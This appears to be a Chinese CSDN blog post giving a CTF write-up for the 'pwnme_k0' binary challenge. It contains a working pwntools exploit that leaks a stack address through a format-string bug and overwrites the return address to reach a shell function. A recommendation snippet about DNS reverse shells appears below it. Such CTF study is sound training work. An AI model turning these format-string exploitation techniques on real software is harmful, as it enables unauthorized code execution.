三个白帽 - pwnme_k0

最新推荐文章于 2021-03-28 18:27:55 发布
最新推荐文章于 2021-03-28 18:27:55 发布
阅读量961 收藏 1
点赞数
分类专栏: Hacker之路 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcl2840072208/article/details/95394946
版权

ctf wiki

题目:三个白帽 - pwnme_k0

检查代码保护:
在这里插入图片描述
可以看出程序主要开启了 NX 保护以及 Full RELRO 保护。这我们就没有办法修改程序的 got 表了。

运行代码:
猜想代码逻辑,和可能的漏洞。
在这里插入图片描述
发现存在有格式化漏洞,而且有两个点。用户名和密码, 用IDA直接分析这部分

IDA分析:

在这里插入图片描述
通过覆盖ret地址来执行shellcode, 首先远程服务器默认开启ALRS ,可以先泄露sub_400b07 ret 地址 , 然后再将其覆盖

同时发现了 callsystem函数
在这里插入图片描述
动态调试:
将断点打到显示密码观察栈区。栈顶指向的指针为调用函数的栈底,第二个为返回地址,如果我们控制到返回地址,就控制了程序的运行。再从IDA可知,打印的str也是已调用函数的栈底为准。所有我们需要泄露调用函数的栈底,使用格式化参数 %6$p (六个参数放入寄存器)。泄露以后算ret与栈底的偏移(0xf20-0xee8),覆盖地址,任务完成。
在这里插入图片描述
EXP:

from pwn import *
context.log_level="debug"
context.arch="amd64"

sh=process("./pwnme_k0")
binary=ELF("pwnme_k0")
#gdb.attach(sh)

sh.recv()
sh.writeline("1"*8)
sh.recv()
sh.writeline("%6$p")
sh.recv()
sh.writeline("1")
sh.recvuntil("0x")
ret_addr = int(sh.recvline().strip(),16) - 0x38
success("ret_addr:"+hex(ret_addr))


sh.recv()
sh.writeline("2")
sh.recv()
sh.sendline(p64(ret_addr))
sh.recv()
sh.writeline("%2218d%8$hn")

sh.recv()
sh.writeline("1")
sh.recv()
sh.interactive()

题做出来了 ,按道理这道题应该是完了 ,前面说了这里有两个点 ,username 和passwd ,说如果只用一个能不能做出这道题呢(假设username是没有漏洞的)。
思路还是一样通过覆盖ret地址达到我们的效果。

开始分析:

  1. 如上我们有了ret_addr ,
  2. 找到passwd的地址在这里插入图片描述
    同样的断点,我们寄存器中找到passwd的栈地址,0x7fffffffdf04 ,与栈底df20 的偏移为0x1c,为了对齐八字节多输入4字节。
    在这里插入图片描述
    同样与IDA相符,
  3. payload = flat( [ “A”*4,ret_addr, %2202d%11$hn] )

,,,,,,,炸了 调到2点发现忽略对字符串长度的检验 , 该方法不可行。。。。

heri2
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
二进制漏洞挖掘之栈溢出-开启RELRO
ylcangel的专栏
10-18 9863
二进制漏洞-栈溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32位 内核版本:Linux 2.6.32-754.10.1.e...
rhel-server-7.4-x86_64-dvd
01-28
redhat7.4镜像文件,含有最新的红帽官方rpm包。体验最新的红帽系统特性。
三个白帽之从pwn me调试到Linux攻防学习
weixin_34120274的博客
03-08 209
k0_pwn · 2016/06/13 10:190x00 写在前面从 [email protected] 发表关于《来pwn我一下好吗》的write up已经过去一段时间了,这篇write up对于我这样的Linux漏洞攻防新手来说很多地方都是很难理解的,后来结合这篇write up,我又调试了一下这个pwn me的题目,发现无论是从error出的题目,还是z神写的write up,都特别精彩,...
三个白帽 pwnme - k0 [fmtstr] - [Hijack RetAddr]
ACdream
02-27 1052
程序运行起来功能很简单:输入用户名密码、输出用户名密码、退出 运行起来发现:这里可能会有个缓冲区溢出的漏洞,在输入用户名时可以超过20个,超过的部分成了密码 进一步测试发现,该程序存在fmtstr漏洞 在程序4008A6处提供了system("/bin/sh"),所以我们的思路是,劫持某个函数返回地址到这儿即可 先来计算偏移: 在这里下断 Breakpoi...
三个白帽-来 PWN 我一下好吗 writeup
weixin_34124577的博客
03-08 173
explorer · 2016/05/30 10:530x00 前言三个白帽终于出了一个pwn的挑战。总算是能让我这种不会web的菜鸡拿几个猫币了。而且这一道题目出的很有心意,后面利用过程一环扣一环,质量很高。现在就来分享一些详细的利用思路。附上原文件:vms.zip0x01 代码分析做pwn题的第一步就是要分析代码,寻找漏洞。这次的程序代码流程不是很长,总共的函数数量也只有十几个,所以在分析代码...
三个白帽挑战赛第二期的writeup(详细记录一系列的坑) [代码审计]
qq_28247467的博客
03-30 1280
post by answer / 2016-3-25 20:41 Friday 首先想说这是我见过的最绕的题目了,不得不说出题人的思路太猥琐。   首先在访问http://8ed0a7d1a5ed5b5ac.jie.sangebaimao.com/sangebaomao.zip得到源码。根据tips是二次注入还要getshell。看着就带劲。   一、先看看文件吧       其中in
攻防世界_pwn_CGfsb(萌新版)-pwnme解惑
TedLau的博客
02-24 517
首发于鄙人博客:传送门 0x00 前言 格式化字符串漏洞。 file checksec结果如下所示: NX打开,就是说堆栈不可执行。 PIE未打开,也就是说,我们在ida中国所看到的就是函数地址在运行过程中的地址。 0x10 步骤 0x11 main函数 在main函数中,我们可以发现printf函数的用法与我们平时使用C语言的习惯不同,这样的用法会给系统...
Automatic-Helmet-Detection-master.zip_helmet-detection_安全帽 检测_安全
07-14
使用机器学习方法进行安全帽的检测,在一定程度上保障了工人的安全。
Redhat-server-6.8-x86_64-dvd iso镜像
02-02
Redhat-server-6.8-x86_64-dvd iso镜像,附件为百度云链接
rhel-server-5.8-x86_64
02-22
rhel-server-5.8-x86_64 redhat 5.8 64bit download 红帽中5.8是5系列中使用最多也是最稳定的
pwnme1题目
09-30
pwnme1的题目,这个是一个简单的栈溢出的题目
RHEL-Server-6/7/8-x86_64-dvd 各版本百度网盘共享
10-14
RHEL,即Red Hat Enterprise Linux的缩写,是Red Hat公司的Linux系统。网盘含内有 rhel 6、7、8、8.1等各版本(已增加 boot.iso)
攻防世界PWN之notebook题解
seaaseesa的博客
11-21 520
Notebook 研究了一下,做出来的人挺少,还挺有成就感 首先,检查一下程序的保护机制,发现PIE和RELRO开启 然后,我们用IDA分析一下,看起来好复杂的样子 发现有溢出和格式化字符串漏洞 首先当然是想到利用格式化字符串漏洞来泄露canary的值 要想执行格式化字符串漏洞,得满足那个if条件 我想了好久,才反应过来,如果有传入格式化的字符串,这个条件就不可...
好好说话之hijack retaddr
hollk’s blog
08-11 1030
格式化字符串做到这里,博主有一些感悟。相比于栈溢出来讲,格式化字符串漏洞对于泄露或者覆盖闲的更容易点,主要注意的就是第几个参数,使用%p、%s、%n这几种格式化字符串。也可能是我做题比较少的原因,只遇到了这几个。最近一直做格式化字符串,所以做得比较顺手,希望看这篇文章的你也能有所收获。编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ hijack retaddr 看名字就能知道这一次我们劫持的是ret返回地址,我们通过覆盖返回地址,printf函数结束后让原有的执行流程发生改变
三個白帽-条条大路通罗马系列2-Writeup
weixin_33856370的博客
03-08 219
路人甲 · 2016/05/23 16:360x00 前言好好的Web咋變成了misc?友谊小船,說翻就翻!!!!http://4e79618700b44607c.jie.sangebaimao.com 复制代码0x01 獲取源碼沒有Tips的代碼審計題,源碼獲取必定是第一關。右鍵看源碼,沒東西,看看header頭,果然有蹊蹺。Set-Cookie source=WXpOV2FXTXpVbmxMU...
三个白帽挑战之二进制题《迷阵陷落》分析
weixin_34408624的博客
03-08 186
netwind · 2016/05/12 10:280x00 前言三个白帽在线挑战平台,集WEB和二进制挑战于一身,以在线挑战的形式把网络安全相关领域白帽子的技术和智慧淋漓尽致地展现出来,为白帽子们搭建了一个非常完美、和谐的在线交流平台,使得白帽子之间可以融洽地施展绝技、交流创意和想法。一次一次的挑战让白帽子们大饱眼福、乐在其中,让大家脑洞大开,并且收获满满,同时回味无穷!由于对windows平台...
php挑战赛,三个白帽挑战赛第三期的简单思路(第一次接触php反序列化)
weixin_39627144的博客
03-28 82
又一期三个白帽来了,由于某些原因,就只讲讲大概的思路,就不讲那么详细啦。主要是第一次接触反序列化。感觉又学到了新姿势。哈哈一、界面没什么变化,还是注册用户,然后登陆。二、登陆之后出现选择控制面板的选项,一个是管理员的面板选项,另一个是普通会员的面板选项。很明显需要越权啦。三、根据tips直接用0x就能提权为管理员。四、进入管理员的界面,可以编辑文章,还有搜索选项,从代码来看,很明显有个注入五、准备...
DNS反弹Shell
Fly_鹏程万里
06-08 2422
0X01 引子反弹Shell广泛应用于远程控制下的权限维持,通过反转攻(客户端)和受(服务端)的角色,来实现条件限制,尤其是内网情况下的远程连接。反弹Shell的工具和实现方法多种多样,只要能够让被控端通过网络发送数据到控制端,并且实现数据的解析即可完成控制过程。最近在继续了解网络协议,于是突然想在DNS数据包中插入一些伪造的命令来实现解析,本来准备自己尝试写一个DNS服务器和DNS请求程序来实现...
白帽黑客学习之旅:从基础到高级
"猪猪侠"的白帽学习路线是一个由浅入深、实战与理论相结合的过程,强调了从基础知识到高级安全概念的学习,以及持续的自我提升和对新技术的关注。这条路线对于任何希望从事信息安全行业的人,尤其是白帽黑客或安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值